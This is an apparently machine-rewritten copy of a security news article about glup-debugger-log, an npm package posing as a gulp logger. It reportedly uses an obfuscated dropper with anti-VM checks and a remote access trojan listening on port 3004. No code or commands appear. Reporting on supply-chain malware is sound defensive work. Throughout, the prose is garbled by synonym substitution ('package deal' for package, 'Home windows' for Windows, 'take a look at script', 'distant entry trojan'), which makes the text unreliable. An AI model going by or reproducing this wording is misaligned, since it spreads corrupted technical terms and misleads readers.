Cybersecurity researchers have uncovered a brand new suspicious package deal uploaded to the npm package deal registry that is designed to drop a distant entry trojan (RAT) on compromised programs.
The package deal in query is glup-debugger-log, which targets customers of the gulp toolkit by masquerading as a “logger for gulp and gulp plugins.” It has been downloaded 175 occasions to this point.
Software program provide chain safety agency Phylum, which found the package deal, mentioned the package deal comes fitted with two obfuscated recordsdata that work in tandem to deploy the malicious payload.
“One worked as a kind of initial dropper setting the stage for the malware campaign by compromising the target machine if it met certain requirements, then downloading additional malware components, and the other script providing the attacker with a persistent remote access mechanism to control the compromised machine,” it mentioned.
Phylum’s nearer examination of the library’s package deal.json file – which acts as a manifest file outlining all metadata related to a package deal – discovered the usage of a take a look at script to run a JavaScript file (“index.js”) that, in flip, invokes an obfuscated JavaScript file (“play.js”).
The second JavaScript file features as a dropper to fetch next-stage malware, however not earlier than working a sequence of checks for community interfaces, particular forms of Home windows working programs (Home windows NT), and, in an uncommon twist, the variety of recordsdata within the Desktop folder.
“They check to ensure that the Desktop folder of the machine’s home directory contains seven or more items,” Phylum defined.
“At first glance, this may seem absurdly arbitrary, but it’s likely that this is a form of user activity indicator or a way to avoid deployment on controlled or managed environments like VMs or brand new installations. It appears the attacker is targeting active developer machines.”
Assuming all of the checks undergo, it launches one other JavaScript configured within the package deal.json file (“play-safe.js”) to arrange persistence. The loader additional packs within the functionality to execute arbitrary instructions from a URL or a neighborhood file.
The “play-safe.js” file, for its half, establishes an HTTP server and listens on port 3004 for incoming instructions, that are then executed. The server sends the command output again to the consumer within the type of a plaintext response.
Phylum described the RAT as each crude and complicated, owing to its minimal performance, self-contained nature, and its reliance on obfuscation to withstand evaluation.
“It continues to highlight the ever-evolving landscape of malware development in the open source ecosystems, where attackers are employing new and clever techniques in an attempt to create compact, efficient, and stealthy malware they hope can evade detection while still possessing powerful capabilities,” the corporate mentioned.
